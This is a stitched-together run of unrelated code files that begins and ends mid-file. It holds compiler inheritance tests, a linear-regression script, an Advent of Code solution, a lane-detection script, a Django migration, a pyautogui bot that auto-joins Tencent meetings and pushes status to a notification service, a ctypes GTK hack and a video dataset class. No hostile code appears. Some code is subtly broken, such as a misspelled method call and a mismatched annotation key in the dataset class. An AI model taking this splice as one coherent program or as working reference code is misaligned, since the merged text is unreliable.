B1& b1 ) {} fn BarA ( A & a ) {} fn BarB ( B & b ) {} fn BarC ( C & c ) {} fn Foo() { var C c; // Undirect child to parent conversion for class with multiple parents. BarA0(c); BarA1(c); BarB0(c); BarB1(c); BarA (c); BarB (c); BarC (c); } """ tests_lib.build_program( c_program_text, ) tests_lib.run_function( "_Z3Foov" ) def CopyChildToParent_Test0(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} fn constructor( A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var B b( 5635224 ); var A a= b; // Copy via expression initializer. return a.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 5635224 ) def CopyChildToParent_Test1(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} fn constructor( A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var B b( 11241 ); var A a(b); // Copy via copy constructor call with reference cast. return a.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 11241 ) def CopyChildToParent_Test2(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} op=( mut this, A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var A mut a( 0 ); var B b( 66685 ); a= b; // Call copy-assignnment return a.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 66685 ) def CopyChildToParent_Test3(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} fn constructor( A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Bar( A a ) : i32 { return a.x; } fn Foo() : i32 { var B b( 44758 ); return Bar(b); // Copy in function call } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 44758 ) def MoveClassWithParent_Test0(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Bar( B b ) : i32 { return b.x; } fn Foo() : i32 { return Bar( B( 58 ) ); // Move in function call } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 58 ) def MoveClassWithParent_Test1(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { auto b= B( 66584 ); // Move in aut-variable initialization return b.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 66584 ) def MoveClassWithParent_Test2(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var B b= B( 965856 ); // Move in variable initialization return b.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 965856 ) def MoveClassWithParent_Test3(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var B mut b(0); b= B( 11125 ); // Move in assignment return b.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 11125 ) def GeneratedCopyConstructor_Test0(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} fn constructor( A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} fn constructor( B &imut other )= default; } fn Foo() : i32 { var B b( 99965 ); var B b2= b; halt if( b.x != b2.x ); return b2.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 99965 ) def AbstractClassConstructor_Test0(): c_program_text= """ class A abstract { fn Foo( this ){} fn constructor() { Foo(); // "this" unavailable in constructor of abstrat class, so, we can not here call "thiscall" function. } } """ errors_list= ConvertErrors( tests_lib.build_program_with_errors( c_program_text ) ) assert( len(errors_list) > 0 ) assert( errors_list[0].error_code == "CouldNotSelectOverloadedFunction" ) assert( errors_list[0].src_loc.line == 7 ) def AbstractClassConstructor_Test1(): c_program_text= """ class A; class A abstract { fn constructor() { this; // "this" unavailable in constructor of abstrat class. } } """ errors_list= ConvertErrors( tests_lib.build_program_with_errors( c_program_text ) ) assert( len(errors_list) > 0 ) assert( errors_list[0].error_code == "ThisUnavailable" ) assert( errors_list[0].src_loc.line == 7 ) def AbstractClassConstructor_Test2(): c_program_text= """ class A abstract { i32 x; fn constructor() ( x= 0 ) { x= 42; // Ok, can directly access fields. } } """ tests_lib.build_program( c_program_text ) def AbstractClassDestructor_Test0(): c_program_text= """ class A; class A abstract { fn destructor() { this; // "this" unavailable in destructor of abstract class. } } """ errors_list= ConvertErrors( tests_lib.build_program_with_errors( c_program_text ) ) assert( len(errors_list) > 0 ) assert( errors_list[0].error_code == "ThisUnavailable" ) assert( errors_list[0].src_loc.line == 7 ) def AbstractClassDestructor_Test1(): c_program_text= """ class A; class A interface { fn destructor() { this; // "this" unavailable in destructor of interface. } } """ errors_list= ConvertErrors( tests_lib.build_program_with_errors( c_program_text ) ) assert( len(errors_list) > 0 ) assert( errors_list[0].error_code == "ThisUnavailable" ) assert( errors_list[0].src_loc.line == 7 ) def AbstractClassDestructor_Test2(): c_program_text= """ class A; fn Foo( A& a ){} class A abstract { i32 x; fn constructor()( x= 0 ){} fn destructor() { x= 42; // Ok, can directly access fields. } } """ tests_lib.build_program( c_program_text ) #M=2 import numpy as np import matplotlib.pyplot as plt import math import random #data preprocesing: #feature data dataX=np.genfromtxt("dataset_X.csv",delimiter=',') dataX=np.delete(dataX,[0],axis=1) #target data dataT=np.genfromtxt("dataset_T.csv",delimiter=',') dataT=np.delete(dataT,[0],axis=1) #shuffle the data to avoid the strange distribution #concatenate the feature and target matrix and shuffle together def shuffle(dataX,dataT): data_temp=np.c_[dataT,dataX] np.random.shuffle(data_temp) dataT=data_temp[:,0] dataX=np.delete(data_temp,[0],axis=1) return dataX,dataT def normalization(dataX,dataT): #features mean_X=[] std_X=[] for i in range(0,17): mean_X.append(np.mean(dataX[:,i])) std_X.append(np.std(dataX[:,i])) dataX_n=np.zeros(np.shape(dataX)) for i in range(0,len(dataX)): for j in range(0,17): dataX_n[i,j]=(dataX[i,j]-mean_X[j])/std_X[j] dataX=dataX_n #target mean_T=np.mean(dataT[:]) std_T=np.std(dataT[:]) dataT_n=np.zeros(np.shape(dataT)) for i in range(0,len(dataT)): dataT_n[i]=(dataT[i]-mean_T)/std_T return dataX,dataT # append the dataX to match the theta (171 features) def data_preprocessing(dataX): k=18 for i in range(1,18): for j in range(1,i+1): if k in range(18,171): dataX=np.insert(dataX,k,values=dataX[:,i]*dataX[:,j],axis=1) k+=1 return dataX #split the data into training set and the testing set def train_test_split(X,Y,test_size): X_train=np.array(X[:math.floor(len(X)*(1-test_size))]) Y_train=np.array(Y[:math.floor(len(Y)*(1-test_size))]) X_test=np.array(X[math.floor(len(X)*(1-test_size)):]) Y_test=np.array(Y[math.floor(len(Y)*(1-test_size)):]) Y_train=Y_train.reshape(1,len(Y_train)) Y_test=Y_test.reshape(1,len(Y_test)) return X_train, X_test, Y_train, Y_test #hypothesis function def hypothesis(theta,X): return np.matmul(theta,np.transpose(X)) #gradient descent def gradient_descent(theta,X,T,learning_rate,iteration): N=len(X) cost_function=[] for i in range(1,iteration+1): cost_function.append(np.sum((hypothesis(theta,X)-T)**2)/len(X)/2) theta_grad=(1/N)*np.matmul((hypothesis(theta,X)-T),(X)) theta-=learning_rate*theta_grad return theta,cost_function #root mean square error def rmse(a,b): return math.sqrt(np.sum((a-b)**2)/len(a)) #parameter: learning_rate=0.01 iteration=10000 theta=np.zeros((1,171)) dataX,dataT=normalization(dataX,dataT) dataX,dataT=shuffle(dataX,dataT) temp=np.array([1]*len(dataX)) dataX=np.c_[temp,dataX] # append the dataX to match the theta (171 features) dataX=data_preprocessing(dataX) X_train,X_test,T_train,T_test = train_test_split(dataX,dataT, test_size = 0.2) theta,cost_function=gradient_descent(theta,X_train,T_train,learning_rate,iteration) #plot the cost function versus iteration times x=np.arange(0,len(cost_function)) plt.plot(x,cost_function,'b.') plt.title("cost function versus iteration times") plt.xlabel("iteration times") plt.ylabel("cost function") plt.show() #plot the value of the model predict and the actual model (train part) x=np.arange(0,len(X_train)) y=hypothesis(theta,X_train).reshape(len(X_train),) T_train=T_train.reshape(len(X_train),) plt.plot(x,y,color='red',lw=1.0,ls='-',label="training_predict_value") plt.plot(x,T_train,color='blue',lw=1.0,ls='-',label="target_value") plt.text(0,1,"RMSE=%.3lf" %(rmse(T_train,y))) plt.xlabel("the nth data") plt.ylabel("PM2.5") plt.title("Linear regression (M=2) training") plt.legend() plt.show() #plot the value of the model predict and the actual model (test part) x=np.arange(0,len(X_test)) y=hypothesis(theta,X_test).reshape(len(X_test),) T_test=T_test.reshape(len(X_test),) plt.plot(x,y,color='red',lw=1.0,ls='-',label="testing_predict_value") plt.plot(x,T_test,color='blue',lw=1.0,ls='-',label="target_value") plt.text(0,1,"RMSE=%.3lf" %(rmse(T_test,y))) plt.xlabel("the nth data") plt.ylabel("PM2.5") plt.title("Linear regression (M=2) testing") plt.legend() plt.show()#!/usr/bin/env python # encoding: utf-8 """ Advent of Code 2019 - Day 16 - Challenge 1 https://adventofcode.com/2019/day/16 Solution: 19944447 PEP 8 compliant """ __author__ = "" __email__ = "" def precalculate_pattern(n_data, pattern): full_pattern = [] P = len(pattern) for k in range(n_data): # output digit index pattern_line = [] for ix in range(n_data): # input digit index ip = ((ix+1) // (k+1)) % P # creates proper patter for the digit pattern_line.append(pattern[ip]) full_pattern.append(pattern_line) return full_pattern def fft_phase(data, full_pattern): output = [] N = len(data) for k in range(N): # output digit index # |sum data[i]*pattern[i]| % 10 output.append( abs(sum(x*y for (x, y) in zip(data, full_pattern[k]))) % 10) return output def main(n_phases=100): data = [] with open('inputs/day_16_input.txt') as file: for digit in file.read(): data.append(int(digit)) full_pattern = precalculate_pattern(len(data), [0, 1, 0, -1]) for _ in range(n_phases): data = fft_phase(data, full_pattern) datastring = ''.join(str(x) for x in data[:8]) print("\nPattern after {0} FFT phases: {1}...\n" .format(n_phases, datastring)) return int(datastring) if __name__ == "__main__": main() from .connect import Connect from .model_manage import ModelManage from .engine import Engine import sys if sys.version_info < (3, 0): reload(sys) # noqa: F821 sys.setdefaultencoding("utf-8") chakrank/FFL_10 # -*- coding: utf-8 -*- """ Created on Thu Mar 22 12:17:27 2018 Enviroment test To verify which packages are present @author: chakrank """ import cv2 import matplotlib.image as mpimg import numpy as np def gray(image): gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) # Define a kernel size and apply Gaussian smoothing kernel_size = 3 #5 or 9 these apply the average of a the matrix blur_gray = cv2.GaussianBlur(gray,(kernel_size, kernel_size),0) #0 # Define our parameters for Canny and apply low_threshold = 30 #40 high_threshold = 90 #80 edges = cv2.Canny(blur_gray, low_threshold, high_threshold) return edges def mask_image(image): edge = gray(image) mask = np.zeros_like(cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)) ignore_mask_color = (255,255,255) imshape = image.shape y_upper = imshape[0]*0.65 y_bottom = imshape[0] #0.9Bottom is also chosen to avoid hood of the car x_left_upper = imshape[1]*0.4 x_right_upper = imshape[1]*0.6 vertices = np.array([[(imshape[1]*0.05,y_bottom),(x_left_upper, y_upper), (x_right_upper, y_upper),(imshape[1]*0.95,y_bottom)]], dtype=np.int32) cv2.fillPoly(mask, vertices, ignore_mask_color) masked_edges = cv2.bitwise_and(edge, mask) return masked_edges def lines_image(image): masked_edges = mask_image(image) rho = 1 #1 distance resolution in pixels of the Hough grid theta = np.pi/180 # angular resolution in radians of the Hough grid threshold = 20 #1 minimum number of votes (intersections in Hough grid cell) min_line_length = 5 #10 minimum number of pixels making up a line max_line_gap = 2 #2 maximum gap in pixels between connectable line segments lines = cv2.HoughLinesP(masked_edges, rho, theta, threshold, np.array([]),min_line_length, max_line_gap) # To see the Hough's marking uncomment the following """ edges = gray(image) line_image = np.copy(image)*0 for line in lines: for x1,y1,x2,y2 in line: h_lines = cv2.line(line_image,(x1,y1),(x2,y2),[0,0,255],3) color_edges = np.dstack((edges, edges, edges)) lines_edges = cv2.addWeighted(color_edges, 0.8, h_lines, 1, 0) cv2.imshow("h_lines",lines_edges) cv2.waitKey(0) cv2.destroyAllWindows() """ # Iterate over the output "lines" and draw lines on a blank image x_left = [] y_left = [] x_right = [] y_right = [] slope_left = [] slope_right = [] constant_left = [] constant_right = [] for line in lines: for x1,y1,x2,y2 in line: if x1 == x2: m = np.Infinity else: m = round(((-1)*(y2-y1)/(x2-x1)), 2) if m > 0.43 and m < 1.57: x_left.append(x1) y_left.append(y1) x_left.append(x2) y_left.append(y2) slope_left.append(m) c1 = round(y1 - m*x1,2) c2 = round(y2 - m*x2,2) constant_left.append(c1) constant_left.append(c2) elif m < -0.43 and m > -1.57: x_right.append(x1) y_right.append(y1) x_right.append(x2) y_right.append(y2) slope_right.append(m) c1 = round(y1 - m*x1,2) c2 = round(y2 - m*x2,2) constant_right.append(c1) constant_right.append(c2) else: None co_ordinates = [x_left, x_right, y_left, y_right, slope_left, slope_right, constant_left, constant_right] return co_ordinates def guide_lines(image): edges = gray(image) line_image = np.copy(image)*0 imshape = image.shape y_top = np.int32(imshape[0]*0.65) y_bottom = imshape[0] [x_left, x_right, y_left, y_right, slope_left, slope_right, constant_left, constant_right] = lines_image(image) left_slope = round(np.mean(slope_left),2) right_slope = round(np.mean(slope_right), 2) left_constant = round(np.mean(constant_left),2) right_constant = round(np.mean(constant_right), 2) cl = round(y_bottom - left_slope*275,2) cr = round(y_bottom - right_slope*1140,2) # These are used just for presepective #x_left_bottom = 275 #x_left_top = 520 #x_right_top = 720 #x_right_bottom = 1140 # The follwoing uses maximum conditon x_left_top = max(x_left) x_left_bottom = min(x_left) x_right_top = min(x_right) x_right_bottom = max(x_right) #The following uses the conditon y = m*x + c and ((y2-y1)/(x2-x1))= m """ x_left_bottom = np.float32(round(((y_bottom - left_constant))/left_slope ,2)) x_left_top = x_left_bottom - ((y_top-y_bottom)/left_slope) x_left_top = np.float32(round(x_left_top)) Righty x_right_bottom = np.float32(round((y_bottom - right_constant)/right_slope,2)) x_right_top = x_right_bottom - ((y_top-y_bottom)/right_slope) x_right_top = np.float32(round(x_right_top)) """ line_r = cv2.line(line_image, (x_right_bottom, imshape[0]), (x_right_top, y_top), (0, 0, 255), 10) #Plottin Left line on the above image line_LnR = cv2.line(line_r, (x_left_bottom, imshape[0]), (x_left_top, y_top), (0, 0, 255), 10) # Iterate over the output "lines" and draw lines on a blank image # Create a "color" binary image to combine with line image color_edges = np.dstack((edges, edges, edges)) # Draw the lines on the edge image lines_edges = cv2.addWeighted(color_edges, 0.8, line_LnR, 1, 0) return lines_edges file_name = "solidWhiteRight.mp4" #solidWhiteRight.mp4 solidYellowLeft.mp4 challenge.mp4 cap = cv2.VideoCapture(file_name) # Width of the frames in the video stream. frame_width = int(cap.get(3)) # Height of the frames in the video stream frame_height = int(cap.get(4)) #Frame rate fps = int(cap.get(5)) #4-character code of codec fourcc = (cv2.VideoWriter_fourcc('F','M','P','4')) out = cv2.VideoWriter('solidWhiteRightOut.mp4',fourcc, fps, (frame_width,frame_height)) while True: ret, frame = cap.read() if ret == True: frame_out = guide_lines(frame) out.write(frame) #print("in\n>", frame,"out\n>", frame_out) #Displyaing the resulting frame cv2.imshow("frame", frame_out) #Press Q to exit if cv2.waitKey(1) & 0XFF == ("q"): break else: break #When everything is done release the video capturing object and out object cap.release() out.release() cv2.destroyAllWindows() spec/data/observable_meta_spec.py1-10 import mock from data import observable_meta from spec.mamba import * with description('observable_meta'): with it('instantiates'): expect(observable_meta.ObservableMeta()).to(be_empty) with it('publishes changes'): m = observable_meta.ObservableMeta() observer = mock.Mock() m.subscribe(observer) expect(observer.on_next.call_count).to(equal(0)) m['something'] = 1 expect(observer.on_next.call_count).to(equal(1)) expect(observer.on_next.call_args).to(equal(mock.call(m))) # Generated by Django 3.2.8 on 2021-10-27 06:06 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Matakuliah', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('nama', models.CharField(choices=[('Alin', 'Aljabar Linear'), ('MPPI', 'Metodologi Penelitian dan Penulisan Ilmiah'), ('PBP', 'Pemrograman Berbasis Platform'), ('SOSI', 'Sistem Operasi untuk Sistem Informasi'), ('SDA', 'Struktur Data & Algoritma')], max_length=200)), ('kelas', models.CharField(max_length=1)), ('SKS', models.CharField(max_length=1)), ], ), migrations.CreateModel( name='Jadwal', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('hari', models.CharField(choices=[('Senin', 'Senin'), ('Selasa', 'Selasa'), ('Rabu', 'Rabu'), ('Kamis', 'Kamis'), ('Jumat', 'Jumat')], max_length=10)), ('start', models.CharField(max_length=10)), ('end', models.CharField(max_length=10)), ('matkul', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='schedule_kuliah.matakuliah')), ], ), migrations.CreateModel( name='Dosen', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('nama', models.CharField(max_length=100)), ('nomor_telepon', models.CharField(max_length=13)), ('email', models.CharField(max_length=100)), ('matkul', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='schedule_kuliah.matakuliah')), ], ), ] import os import sys import pandas as pd import pyautogui import logging import urllib3 import time from datetime import datetime # 入会结果是否发送微信消息 sendResult = True # 微信绑定SDK(此处配置自己的SDK) sdk = '**********************' # 腾讯会议应用程序路径 meetPath = "D:/Program Files (x86)/Tencent/Meet/WeMeet/wemeetapp.exe" # 微信推送消息标题 successTitle = "入会成功!" failTitle = "入会失败!" # logging.basicConfig(filename="server.log",filemode="w",format="[%(asctime)s]-[%(name)s]-[%(levelname)s] %(message)s",level=logging.INFO) # 创建一个logger logger = logging.getLogger('mylogger') logger.setLevel(logging.DEBUG) # 创建一个handler,用于写入日志文件 fh = logging.FileHandler('server.log') fh.setLevel(logging.DEBUG) # 再创建一个handler,用于输出到控制台 ch = logging.StreamHandler() ch.setLevel(logging.DEBUG) # 定义handler的输出格式 formatter = logging.Formatter("[%(asctime)s][%(thread)d][%(filename)s][line: %(lineno)d][%(levelname)s] ## %(message)s") fh.setFormatter(formatter) ch.setFormatter(formatter) # 给logger添加handler logger.addHandler(fh) logger.addHandler(ch) # 需要一个PoolManager实例来生成请求,由该实例对象处理与线程池的连接以及线程安全的所有细节,不需要任何人为操作: http = urllib3.PoolManager() global meetingState meetingState = False def getPath(filename): # 方法一(如果要将资源文件打包到app中,使用此法) bundle_dir = getattr(sys, '_MEIPASS', os.path.abspath(os.path.dirname(__file__))) path = os.path.join(bundle_dir, filename) return path # Excel文件路径 excelPath = getPath("meetingList.xlsx") df = pd.read_excel(excelPath) def signIn(meeting_id, password): # 从指定位置打开应用程序 os.startfile(meetPath) time.sleep(5) # 点击加入按钮 joinbtn = pyautogui.locateCenterOnScreen(getPath("buttons/joinameeting.png")) pyautogui.moveTo(joinbtn) pyautogui.click() time.sleep(2) # 输入会议 ID try: meetingidbtn = pyautogui.locateCenterOnScreen(getPath("buttons/meetingId.png")) pyautogui.moveTo(meetingidbtn) pyautogui.write(meeting_id) time.sleep(2) except: meetingidbtn = pyautogui.locateCenterOnScreen(getPath("buttons/inputMeetingId.png")) pyautogui.moveTo(meetingidbtn) pyautogui.write(meeting_id) time.sleep(2) # 关闭视频和音频 try: mediaBtn = pyautogui.locateAllOnScreen(getPath("buttons/media.PNG")) pyautogui.moveTo(mediaBtn) pyautogui.click() except: logger.info("入会开启摄像头已关闭,无需自动取消。") try: audioBtn = pyautogui.locateAllOnScreen(getPath("buttons/audio.PNG")) pyautogui.moveTo(audioBtn) pyautogui.click() time.sleep(2) except: logger.info("入会开启麦克风已关闭,无需自动取消。") # 加入 join = pyautogui.locateCenterOnScreen(getPath("buttons/join.PNG")) pyautogui.moveTo(join) pyautogui.click() time.sleep(2) # 输入密码以加入会议 passcode = pyautogui.locateCenterOnScreen(getPath("buttons/meetingPasscode.PNG")) pyautogui.moveTo(passcode) pyautogui.write(password) time.sleep(1) # 点击加入按钮 joinmeeting = pyautogui.locateCenterOnScreen(getPath("buttons/joinmeeting.PNG")) pyautogui.moveTo(joinmeeting) pyautogui.click() time.sleep(2) def signInExcelMeeting(): now = datetime.now().strftime("%Y-%m-%d %H:%M") if now in str(df['Timings']): mylist = df["Timings"] mylist = [i.strftime("%Y-%m-%d %H:%M") for i in mylist] c = [i for i in range(len(mylist)) if mylist[i] == now] row = df.loc[c] meeting_id = str(row.iloc[0, 1]) password = str(row.iloc[0, 2]) global meetingTitle, meetingTime, meetingId meetingTitle = str(row.iloc[0, 3]) meetingTime = str(row.iloc[0, 0]).replace(" ", "%20") meetingId = str(row.iloc[0, 1]) time.sleep(5) try: signIn(meeting_id, password) time.sleep(2) logger.info(meeting_id + ":" + meetingTitle + " " + successTitle) meetingState = True if sendResult == True: logger.info("开始推送微信状态...") try: url = 'https://sc.ftqq.com/' + sdk + \ ".send?title=" + meetingTitle + "%20%20" + successTitle + \ "&desp=会议信息如下:" \ "%0a%0d会议时间:" + meetingTime + \ "%0a%0d会议号:" + meetingId + \ "%0a%0d会议主题:" + meetingTitle # 通过request()方法创建一个请求,该方法返回一个HTTPResponse对象: r = http.request('GET', url) logger.info("微信消息发送成功。") except Exception as e: logger.info("微信推送失败。") logger.exception(e.args) else: logger.info("配置为不推送微信状态。") except: logger.info(meeting_id + failTitle) if sendResult == True: logger.info("开始推送微信状态...") try: url = "https://sc.ftqq.com/" + sdk + \ ".send?title=" + meetingTitle + "%20%20" + failTitle + \ "&desp=会议信息如下:" \ "%0a%0d会议时间:" + meetingTime + \ "%0a%0d会议号:" + meetingId + \ "%0a%0d会议主题:" + meetingTitle logger.info(url) # 通过request()方法创建一个请求,该方法返回一个HTTPResponse对象: r = http.request('GET', url) logger.info("微信消息发送成功。") except Exception as e: logger.info("微信推送失败。") logger.exception(e.args) else: logger.info("配置为不推送微信状态。") def quitMeeting(): try: quitBtn = pyautogui.locateCenterOnScreen(getPath("buttons/quitMeeting.png")) pyautogui.moveTo(quitBtn) pyautogui.click() except: logger.error("未找到离开会议按钮。") time.sleep(2) if sendResult: logger.info("开始推送微信状态...") now = datetime.now().strftime("%Y-%m-%d %H:%M:%S").replace(" ", "%20") try: url = "https://sc.ftqq.com/" + sdk + \ ".send?title=" + meetingTitle + "%20%20已结束" + \ "&desp=会议信息如下:" \ "%0a%0d会议时间:" + meetingTime + \ "%0a%0d会议号:" + meetingId + \ "%0a%0d会议主题:" + meetingTitle + \ "%0a%0d会议结束时间:" + now # 通过request()方法创建一个请求,该方法返回一个HTTPResponse对象: r = http.request('GET', url) logger.info("微信消息发送成功。") except Exception as e: logger.info("微信推送失败。") logger.exception(e.args) else: logger.info("配置为不推送微信状态。") while True: # To get current time now = datetime.now().strftime("%Y-%m-%d %H:%M") logger.info("当前时间:" + now) signInExcelMeeting() quitBtn = pyautogui.locateCenterOnScreen(getPath("buttons/quitMeeting.png")) userSize = pyautogui.locateCenterOnScreen(getPath("buttons/userSize.png")) thanks = pyautogui.locateCenterOnScreen(getPath("buttons/thanks.png")) # 存在退出按钮和人数37 或者 存在退出按钮和感谢话语 if (quitBtn != None and userSize != None and meetingState) or (quitBtn != None and thanks != None and meetingState): quitMeeting() else: if meetingState: logger.info("会议未结束。") elif meetingState == False: logger.info("无正在进行中的会议。") time.sleep(60) lib/reinteract/iter_copy_from.py1-10 # Copyright 2007 # # This file is part of Reinteract and distributed under the terms # of the BSD license. See the file COPYING in the Reinteract # distribution for full details. # ######################################################################## import gtk from ctypes import * # This works around a hole in the pygtk API, see: # # http://bugzilla.gnome.org/show_bug.cgi?id=481715 # # In theory, it's relatively robust against different architectures, # and even the more probable changes between GTK+/pygtk/Python versions, # but there's a lot that could go wrong. class _GtkTextIter(Structure): _fields_ = [ ("dummy1", c_void_p), ("dummy2", c_void_p), ("dummy3", c_int), ("dummy4", c_int), ("dummy5", c_int), ("dummy6", c_int), ("dummy7", c_int), ("dummy8", c_int), ("dummy9", c_void_p), ("dummy10", c_void_p), ("dummy11", c_int), ("dummy12", c_int), ("dummy13", c_int), ("dummy14", c_void_p) ] class _PyGBoxed_TextIter(Structure): _fields_ = [ ("PyObject_HEAD", c_byte * object.__basicsize__), ("boxed", POINTER(_GtkTextIter) ) ] def iter_copy_from(iter, other): iter_ctypes = _PyGBoxed_TextIter.from_address(id(iter)).boxed.contents other_ctypes = _PyGBoxed_TextIter.from_address(id(other)).boxed.contents for name, type in iter_ctypes._fields_: iter_ctypes.__setattr__(name, other_ctypes.__getattribute__(name)) import os.path as osp import mmcv import numpy as np import torch from torch.utils.data import Dataset from IPython import embed from .pipelines import Compose, FlowAug from .registry import DATASETS @DATASETS.register_module class VideoCustomDataset(Dataset): """ Custom dataset for video detection/tracking Annotation format: [ { 'video_name': '0000', 'img_size': (370, 1224), 'flow_size': (370, 1224), 'quantization': False, 'frames': [ { 'filename': 'training/image_02/0000/000000.png', 'flow_name': 'training/Flow/0000/000000.flo', 'inv_flow_name': 'training/Inv_Flow/0000/000000.flo', 'is_annotated': True, 'intrinsic': (optional), 'ann': { 'bboxes': (n, 4), 'labels': (n, ), 'track_id': (n, ), ... } }, ... ] }, ... ] """ CLASSES = None def __init__(self, ann_file, pipeline, seq_len=5, padding=False, data_root=None, img_prefix='', seg_prefix=None, proposal_file=None, test_mode=False,): super(VideoCustomDataset, self).__init__() self.seq_len = seq_len self.padding = padding self.ann_file = ann_file self.data_root = data_root self.img_prefix = img_prefix self.seg_prefix = seg_prefix self.proposal_file = proposal_file self.test_mode = test_mode # join paths if data_root is specified if self.data_root is not None: if not osp.isabs(self.ann_file): self.ann_file = osp.join(self.data_root, self.ann_file) if not (self.img_prefix is None or osp.isabs(self.img_prefix)): self.img_prefix = osp.join(self.data_root, self.img_prefix) if not (self.seg_prefix is None or osp.isabs(self.seg_prefix)): self.seg_prefix = osp.join(self.data_root, self.seg_prefix) if not (self.proposal_file is None or osp.isabs(self.proposal_file)): self.proposal_file = osp.join(self.data_root, self.proposal_file) # load annotations self.video_infos = self.load_annotations(self.ann_file) self.sample_list = [] for vid, video_info in enumerate(self.video_infos): n_frames = len(video_info['frames']) if self.padding: for i in range(n_frames): self.sample_list.append((vid, i)) else: for i in range(n_frames - self.seq_len + 1): self.sample_list.append((vid, i)) if not self.test_mode: self.flag = np.zeros(len(self), dtype=np.uint8) # processing pipeline self.pipeline = Compose(pipeline) def __len__(self): return len(self.sample_list) def __getitem__(self, idx): if self.test_mode: return self.perpare_clip_test(idx) while True: data = self.prepare_clip_train(idx) if data is None: idx = self._rand_another(idx) continue return data def _rand_another(self, idx): pool = range(len(self)) ret = np.random.choice(pool) while ret == idx: ret = np.random.choice(pool) return ret def load_annotations(self, ann_file): return mmcv.load(ann_file) def prepare_clip_test(self): pass def prepare_clip_train(self, idx): vid, fid = self.sample_list[idx] video = self.video_infos[vid] frames = video['frames'] quantize = video['quantize'] if self.padding: pass else: frames = frames[fid: fid + self.seq_len] # img_names = [x['filename'] for x in frames] flows = [mmcv.flowread(osp.join(self.img_prefix, x['flow_name']), quantize=quantize) for x in frames] inv_flows = [mmcv.flowread(osp.join(self.img_prefix, x['inv_flow_name']), quantize=quantize) for x in frames] img_results = [self.prepare_img_train(frame) for frame in frames] # results encode the transformation info of img # augment the flow/inv_flow accordingly, pack it into results # resize => flip => pad for i, x in enumerate(img_results): if x is None: return None aug_meta = img_results[0]['img_meta'].data resize = aug_meta['img_shape'][:2] pad = aug_meta['pad_shape'][:2] flip = aug_meta['flip'] flow_aug = FlowAug(resize, pad, flip) flows = [torch.tensor(x).permute(2, 0, 1) for x in flows] inv_flows = [torch.tensor(x).permute(2, 0, 1) for x in inv_flows] flows = torch.stack(flows) inv_flows = torch.stack(inv_flows) flows, inv_flows = flow_aug(flows, inv_flows) for idx, img_result in enumerate(img_results): # if not isinstance(img_result, dict): # print("Debug") # print(img_result) # print(frames[idx]) # print(frames) img_result['flow'] = flows[idx] img_result['inv_flow'] = inv_flows[idx] # embed() return img_results def get_ann_info(self, frame): ann = frame['ann'] for k, v in ann.items(): if isinstance(v, list): if 'bbox' in k: ann[k] = np.array(v, dtype=np.float32).reshape(-1, 4) else: ann[k] = np.array(v, dtype=np.int64) return ann def pre_pipeline(self, results): results['img_prefix'] = self.img_prefix results['seg_prefix'] = self.seg_prefix results['proposal_file'] = self.proposal_file results['bbox_fields'] = [] results['mask_fields'] = [] def prepare_img_train(self, frame): img_info = frame ann_info = self.get_ann_info(frame) results = dict(img_info=img_info, ann_info=ann_info) self.pre_pipeline(results) results = self.pipeline(results) return results if __name__ == '__main__': data_root = '/databack1/KITTI/kitti/tracking/' img_norm_cfg = dict( mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True) train_pipeline = [ dict(type='LoadImageFromFile'), dict(type='LoadAnnotations', with_bbox=True), dict(type='Resize', img_scale=(1333, 800), keep_ratio=True), dict(type='RandomFlip', flip_ratio=0.5), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', 